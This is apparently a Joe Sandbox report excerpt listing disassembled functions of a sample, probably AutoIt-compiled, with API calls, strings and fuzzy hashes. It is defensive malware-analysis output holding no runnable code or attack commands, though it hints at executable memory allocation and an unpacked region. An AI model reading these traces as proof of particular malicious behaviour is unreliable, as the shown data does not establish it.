Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E

Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044862B
_memmove.LIBCMT ref: 00448685

Strings

3cA, xrefs: 0044860C
_A, xrefs: 004486FF, 0044DFDC, 0044DFF8

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove
String ID: 3cA$_A
API String ID: 4104443479-3480954128
Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55

Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499

Strings

SysMonthCal32, xrefs: 0048742C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4

Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70

Strings

Listbox, xrefs: 00486D08

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4

Function 0041092D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

_wcscat.LIBCMT ref: 00444CB7

Strings

SL, xrefs: 004109AE
@=, xrefs: 00410988

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: @=$SL
API String ID: 257928180-3689620055
Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D

Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00426B93
__calloc_crt.LIBCMT ref: 00426BAC

Strings

K, xrefs: 00426BD1
@BL, xrefs: 00426BC3

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __calloc_crt
String ID: K$@BL
API String ID: 3494438863-2209178351
Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C

Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00404C1D
kernel32.dll, xrefs: 00404C0C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728

Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56

Strings

kernel32.dll, xrefs: 00404C3F
Wow64RevertWow64FsRedirection, xrefs: 00404C50

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728

Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07

Strings

advapi32.dll, xrefs: 00480DF0
RegDeleteKeyExW, xrefs: 00480E01

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28

Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100

Strings

GetModuleHandleExW, xrefs: 004790FA
kernel32.dll, xrefs: 004790E9

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754

Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94

Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0047E0BE
CharLowerBuffW.USER32(?,?), ref: 0047E101

Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
_memmove.LIBCMT ref: 0047E314

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: c81b934990736e7ca586263f53b5abc7894b56bd203991636d632f22b4f8536e
Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
Opcode Fuzzy Hash: c81b934990736e7ca586263f53b5abc7894b56bd203991636d632f22b4f8536e
Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86

Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004780C3
CoUninitialize.OLE32 ref: 004780CE

Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4

VariantInit.OLEAUT32(?), ref: 004780D9
VariantClear.OLEAUT32(?), ref: 004783AA

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 400ebff4e61cf3e1ee78082ae144ede4a2b3438fd103daf129fc81fa1b0e2089
Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
Opcode Fuzzy Hash: 400ebff4e61cf3e1ee78082ae144ede4a2b3438fd103daf129fc81fa1b0e2089
Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A

Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045688E
SysAllocString.OLEAUT32(00000000), ref: 00456937
VariantCopy.OLEAUT32 ref: 00456966
VariantClear.OLEAUT32(?), ref: 0045698D

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 7754becb9dd03c3fb11d1c3921ac7f651955ce22d4d8892edf307a5e4b31ea25
Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
Opcode Fuzzy Hash: 7754becb9dd03c3fb11d1c3921ac7f651955ce22d4d8892edf307a5e4b31ea25
Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D

Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
WSAGetLastError.WSOCK32(00000000), ref: 004769E1

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
WSAGetLastError.WSOCK32(00000000), ref: 00476A51

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
Opcode Fuzzy Hash: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59

Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
_strlen.LIBCMT ref: 004764D9

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 8fb790e2a9c8bd6545a14043e7be6f0b7450ba35f96a2d2a5733219fc9a7891e
Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
Opcode Fuzzy Hash: 8fb790e2a9c8bd6545a14043e7be6f0b7450ba35f96a2d2a5733219fc9a7891e
Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58

Function 00B934FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00B9354C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B935D5
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B935E7
__freea.LIBCMT ref: 00B935F0

Part of subcall function 00B932FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B9332C

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 299f0acf27ebcb935bf52e1c339f63ea4bfe06c22bfdd1b01191191e18e746e0
